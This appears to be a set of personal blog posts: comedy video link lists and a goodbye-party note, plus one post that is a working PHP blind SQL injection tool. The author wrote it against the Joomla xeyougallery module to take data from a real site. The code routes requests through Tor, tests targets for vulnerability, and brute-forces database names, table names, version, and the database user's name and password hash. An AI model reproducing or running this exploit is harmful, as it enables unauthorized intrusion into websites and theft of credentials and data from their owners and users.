A goodbye party, since some of us are leaving very soon (some are leaving as early as tomorrow). This must be the first time I make an appearance on youtube, I usually don’t like it, but this was an exception since I really enjoyed myself. These guys are great fun ^_^
Part 1
Part 2
This was actually the first place I saw Danny Bhoy, didn’t think about posting this before though.
Scottish Breakfast
http://comedians.jokes.com/danny-bhoy/videos/danny-bhoy—scottish-breakfast
Worst diet in the world
http://comedians.jokes.com/danny-bhoy/videos/danny-bhoy—worst-diet-in-the-world
Half-Scottish, Half-Indian
http://comedians.jokes.com/danny-bhoy/videos/danny-bhoy—half-scottish–half-indian
Danny Bhoy – Alcohol Reminiscence
http://comedians.jokes.com/danny-bhoy/videos/danny-bhoy—alcohol-reminiscence
Found some more from Danny Bhoy, hilarious 
Part 1
Part 2
http://www.youtube.com/watch?v=z3Zk6xHIdMA
Part 3
http://www.youtube.com/watch?v=LLTeX4zVa_E
Part 4
http://www.youtube.com/watch?v=-u960xWA57k
Part 5
http://www.youtube.com/watch?v=Nq-y3j0i-t8
Part 6
http://www.youtube.com/watch?v=zm2DOTSTZj4
Part 7
http://www.youtube.com/watch?v=PNhiboU7tOA
Part 8
I originally made this for a blind sql injection vulnerability that I found in a Joomla module called “xeyougallery”, although I later discovered that someone else had already discovered it before me and published a small example of it (http://packetstorm.arabianits.com/0912-exploits/joomlaxeyou-sql.txt). Although no exploit had been published for it, so I decided to write my own since I wanted some stuff out of a database on a site that used that specific module.
After a while I decided to make a “general” tool that lets me extract data through a Blind SQL Injection vulnerability. I didn’t finish this code, there’s some debug info still left in there as well as a “todo” list. I didn’t finish it because I have started to learn Perl recently, and I decided to rewrite this tool in Perl later, so I’ll finish it then instead. This code can still be used “as is” to extract tables names and some user information.
Current features
*Extract version
*Extract database name
*Extract username and password
*Extract table names
Download
<?php
/****************************************/
/* Blind SQLi tool v1.7 */
/* By: cats */
/****************************************/
/*
Check if curl is activated/installed
*/
if(!function_exists("curl_init"))
die("cURL extension is not installed");
/**************************************/
/* Configuration */
/**************************************/
/*
Host plus path to the vulnerable variable
Example: http://example.com/joomla/index.php?option=com_xeyougallery&Itemid=0&func=viewcategory&catid=1
Where "catid" is the vulnerable one
*/
define('_HOST_PATH_', 'http://www.example.com/index.php?option=com_xeyougallery&Itemid=0&func=viewcategory&catid=1');
/*
A string that is visible on the page when the statement in the injection is true
*/
define('_TRUE_', 'Word');
/*
Proxy settings
(Defaults to polipo/tor)
*/
define('_PROXY_ENABLED_', '1');
define('_PROXY_ADDRESS_', '127.0.0.1');
define('_PROXY_PORT_', '8123');
/*
Charset
*/
define('_CHARS_', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.@-_0123456789$*:;+?()~{}[]^%&/\\#"\'|½><');
/*What functions to use*/
/*Extract table names*/
define('_EXTRACT_TABLES_', '1');
/*Extract version number of database*/
define('_FIND_VERSION_', '1');
/*Extract username and password of current database user*/
define('_EXTRACT_USER_', '1');
/*Extract database name*/
define('_EXTRACT_DATABASE_', '1');
/*Check if host is vulnerable at all (recommended)*/
define('_CHECK_VULNERABLE_', '1');
/*
Table number to continue extracting from.
In case you have to stop in the middle
*/
define('_START_ROW_', '0');
/*
Max number of tables to check for
*/
define('_MAX_TABLES_', '1000');
/*
Max length of version to look for
*/
define('_MAX_VERSION_', '100');
/*
Max length of database name to look for
*/
define('_MAX_DATABASE_', '100');
/*
Max length of username to look for
*/
define('_MAX_USERNAME_', '100');
/*
Max length of password to look for
*/
define('_MAX_PASSWORD_', '300');
/**************************************/
/* Functions */
/**************************************/
function extractTableNames()
{
echo "-=Attempting to dump table names\n";
$chars = _CHARS_;
/*Get number of tables*/
for($i = 0; $i < _MAX_TABLES_; ++$i)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/count(table_name)/**/FROM/**/information_schema.tables)='.$i.',1,2))/**/--';
if(tryConnect($completePath))
$numTables = $i;
}
/*Extract table names, by brute force*/
if($numTables > 0)
{
echo "[+] Number of tables: $numTables\n\n";
for($n = _START_ROW_; $n < $numTables; ++$n)
{
/*Get current table length*/
for($i = 0; $i < 100; ++$i)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/LENGTH((SELECT/**/table_name/**/FROM/**/information_schema.tables/**/LIMIT/**/'.$n.',1)))='.$i.',1,2))/**/--';
if(tryConnect($completePath))
$length = $i;
}
/*Bruteforce table name*/
$word = "";
for($i = 1; $i <= $length; ++$i)
{
for($j = 0, $stop = false; $j < strlen($chars) && !$stop; ++$j)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/substr((SELECT/**/table_name/**/FROM/**/information_schema.tables/**/LIMIT/**/'.$n.',1),'.$i.',1))=0x'.dechex(ord($chars[$j])).',/**/1,/**/2))/**/--';
if(tryConnect($completePath))
{
$word .= $chars[$j];
$stop = true;
}
}
if(!$stop)
{
echo "[-] Table name not found on row $n\n";
if(strlen($word) > 0)
echo "[+] Table name part extracted: $word\n";
}
}
echo $word . "\n";
}
}
else
echo "[-] Unable to determine number of tables\n";
echo "\n\n";
}
function checkVersion()
{
echo "-=Attempting to find database version\n";
$chars = _CHARS_;
$length = 0;
/*Check length of version*/
for($i = 0; $i < _MAX_VERSION_; ++$i)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/LENGTH((SELECT/**/version())))='.$i.',1,2))/**/--';
if(tryConnect($completePath))
{
$length = $i;
break;
}
}
/*Extract version, by brute force*/
if($length > 0)
{
echo "[+] Version length found\n";
$word = '';
for($i = 1; $i <= $length; ++$i)
{
for($j = 0, $stop = false; $j < strlen($chars) && !$stop; ++$j)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/substr((SELECT/**/version()),'.$i.',1))=0x'.dechex(ord($chars[$j])).',/**/1,/**/2))/**/--';
if(tryConnect($completePath))
{
$word .= $chars[$j];
$stop = true;
}
}
if(!$stop)
break;
}
if(strlen($word) == $length)
echo "[+] Found version number!\n[+] Version: " . $word . "\n\n";
else
{
if(strlen($word) > 0)
echo "[+] Version number part extracted: $word\n";
echo "[-] Version number could not be determined\n\n";
}
}
else
echo "[-] Unable to determine version length\n";
}
function checkDatabase()
{
echo "-=Attempting to find database name\n";
$chars = _CHARS_;
$length = 0;
/*Check length of database name*/
for($i = 0; $i < _MAX_DATABASE_; ++$i)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/LENGTH((SELECT/**/database())))='.$i.',1,2))/**/--';
if(tryConnect($completePath))
{
$length = $i;
break;
}
}
if($length > 0)
{
echo "[+] Database name length found\n";
/*Extract database name, by brute force*/
$word = "";
for($i = 1; $i <= $length; ++$i)
{
for($j = 0, $stop = false; $j < strlen($chars) && !$stop; ++$j)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/substr((SELECT/**/database()),'.$i.',1))=0x'.dechex(ord($chars[$j])).',/**/1,/**/2))/**/--';
if(tryConnect($completePath))
{
$word .= $chars[$j];
$stop = true;
}
}
if(!$stop)
break;
}
if(strlen($word) == $length)
echo "[+] Found database name!\n[+] Database: " . $word . "\n\n";
else
{
if(strlen($word) > 0)
echo "[+] Database name part extracted: $word\n";
echo "[-] Database name could not be determined\n\n";
}
}
else
echo "[-] Unable to determine database name length\n";
}
function checkUser()
{
echo "-=Attempting to find Username and Password for current database\n";
$chars = _CHARS_;
$lengthPass = 0;
$lengthUser = 0;
/*Check username length*/
for($i = 0; $i < _MAX_USERNAME_; ++$i)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(SELECT/**/IF((SELECT/**/LENGTH(user()))='.$i.',1,2))/**/--';
if(tryConnect($completePath))
{
$lengthUser = $i;
break;
}
}
/*Check password length*/
for($i = 0; $i < _MAX_PASSWORD_; ++$i)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/LENGTH((SELECT/**/password/**/FROM/**/mysql.user/**/WHERE/**/user/**/=/**/SUBSTRING_INDEX(user(),0x40,1)/**/LIMIT/**/1)))='.$i.',1,2))/**/--';
if(tryConnect($completePath))
{
$lengthPass = $i;
break;
}
}
if($lengthUser > 0)
{
echo "[+] Length of username found\n";
/*Bruteforce username*/
$word = '';
$wordUser = '';
for($i = 1; $i <= $lengthUser; ++$i)
{
for($j = 0, $stop = false; $j < strlen($chars) && !$stop; ++$j)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/substr((SELECT/**/user()),'.$i.',1))=0x'.dechex(ord($chars[$j])).',/**/1,/**/2))/**/--';
if(tryConnect($completePath))
{
$wordUser .= $chars[$j];
$stop = true;
}
}
if(!$stop)
break;
}
if(strlen($wordUser) == $lengthUser)
{
echo "[+] Found username!\n";
$word .= $wordUser;
}
else
{
if(strlen($wordUser) > 0)
echo "[+] Username part extracted: $wordUser\n";
echo "[-] Username could not be determined\n";
}
}
else
echo "[-] Unable to determine length of username, exiting!\n";
$word .= ' - ';
if($lengthPass > 0)
{
echo "[+] Length of password found\n";
$wordPass = '';
/*Bruteforce password*/
for($i = 1; $i <= $lengthPass; ++$i)
{
for($j = 0, $stop = false; $j < strlen($chars) && !$stop; ++$j)
{
$completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/substr((SELECT/**/password/**/FROM/**/mysql.user/**/WHERE/**/user/**/=/**/SUBSTRING_INDEX(user(),0x40,1)/**/LIMIT/**/1),'.$i.',1))=0x'.dechex(ord($chars[$j])).',/**/1,/**/2))/**/--';
if(tryConnect($completePath))
{
$wordPass .= $chars[$j];
$stop = true;
}
}
if(!$stop)
break;
}
if(strlen($wordPass) == $lengthPass)
{
echo "[+] Found Password!\n";
$word .= $wordPass;
}
else
{
if(strlen($wordPass) > 0)
echo "[+] Password part extracted: $wordPass\n";
echo "[-] Password could not be determined\n";
}
}
else
echo "[-] Unable to determine length of password\n";
if(strlen($wordUser) == $lengthUser || strlen($wordPass) == $lengthPass)
echo "[+] User/Pass: " . $word . "\n\n";
}
function checkVulnerable()
{
echo "-=Checking if target is vulnerable\n";
$true = false;
$false = true;
/*True*/
$completePath = _HOST_PATH_ . '/**/AND/**/1=1/**/--';
if(tryConnect($completePath))
$true = true;
/*False*/
$completePath = _HOST_PATH_ . '/**/AND/**/1=2/**/--';
if(!tryConnect($completePath))
$false = false;
if($true && !$false)
echo "[+] Target seems to be vulnerable\n\n";
else
die("[-] Target does not seem to be vulnerable, exiting\n\n");
}
function tryConnect($URL)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $URL);
if(_PROXY_ENABLED_)
curl_setopt($ch, CURLOPT_PROXY, (_PROXY_ADDRESS_ . ':' . _PROXY_PORT_));
$r = curl_exec($ch);
curl_close($ch);
if(stristr($r,_TRUE_))
return true;
return false;
}
/**************************************/
/* Execution */
/**************************************/
echo "************************\n
**Blind SQLi tool v1.7**\n
********By cats*********\n
************************\n\n";
if(_CHECK_VULNERABLE_)
checkVulnerable();
if(_EXTRACT_USER_)
checkUser();
if(_EXTRACT_DATABASE_)
checkDatabase();
if(_FIND_VERSION_)
checkVersion();
if(_EXTRACT_TABLES_)
extractTableNames();
echo "[+] Finished\n";
?>
A Scottish stand up comedian.
I found him by random at http://www.comedycentral.com.
He’s really good!
Part 1
Part 2
http://www.youtube.com/watch?v=RoUAJrJsjAU
Part 3
http://www.youtube.com/watch?v=faYqcGg5jMo
Part 4
http://www.youtube.com/watch?v=GFwzap7Gn3s
Part 5
http://www.youtube.com/watch?v=XtB5VJCjsp0
Part 6
http://www.youtube.com/watch?v=kdhxzYZbkaE
Part 7
http://www.youtube.com/watch?v=g5Lg_0RNfX8
Part 8
